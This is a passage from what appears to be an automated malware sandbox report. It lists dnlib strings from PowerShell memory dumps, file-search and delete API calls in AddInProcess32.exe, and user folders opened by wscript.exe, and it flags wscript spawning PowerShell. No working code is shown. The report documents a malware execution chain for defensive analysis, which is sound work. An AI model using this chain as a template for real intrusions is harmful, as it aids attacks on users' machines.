                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2377012915.00007FF848800000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2377012915.00007FF848800000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041A01B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040B28E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040838E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004087A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00407848
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004068CD FindFirstFileW,FindNextFileW,11_2_004068CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0044BA59 FindFirstFileExA,11_2_0044BA59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040AA71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00417AAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040AC78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406D28
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
